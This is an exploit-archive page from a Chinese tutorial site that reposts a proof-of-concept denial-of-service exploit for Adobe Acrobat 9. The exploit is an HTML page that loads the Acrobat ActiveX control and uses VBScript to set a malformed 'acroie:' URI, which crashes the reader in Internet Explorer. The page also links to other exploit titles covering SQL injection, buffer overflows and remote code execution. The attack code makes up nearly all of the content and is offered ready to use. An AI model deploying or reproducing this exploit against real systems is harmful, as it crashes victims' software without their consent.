手机
当前位置:查字典教程网 >网络安全 >Exploit >Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit
Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit
摘要:arg1="acroie:///DoS"target.src=arg1

<!-- Jeremy Brown (0xjbrown41@gmail.com/jbrownsec.blogspot.com)

Adobe Acrobat 9 Remote DoS (--) Tested on AA9/IE7/Vista

I can't seem to reproduce this on XP! Oh well.

Of course the most popular app for reading pdfs is SfS/SfI :)

Basically it will crash with any uri that adobe doesn't like.

Also interesting: try with file:///DoS and look in bottom left area --> <html><body> <object id=target classid=clsid:CA8A9780-280D-11CF-A24D-444553540000></object>

<script language=vbscript> arg1="acroie:///DoS"

target.src = arg1 </script>

</body></html>

【Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit】相关文章:

webEdition CMS (we_objectID) Blind SQL Injection Exploit

Debian Sarge Multiple IMAP Server Denial of Service Exploit

BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit

LoveCMS 1.6.2 Final Remote Code Execution Exploit

Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC

Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit

DESlock 3.2.7 (vdlptokn.sys) Local Denial of Service Exploit

Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit

Dreampics Builder (page) Remote SQL Injection Vulnerability

Joomla Component EZ Store Remote Blind SQL Injection Exploit

精品推荐
分类导航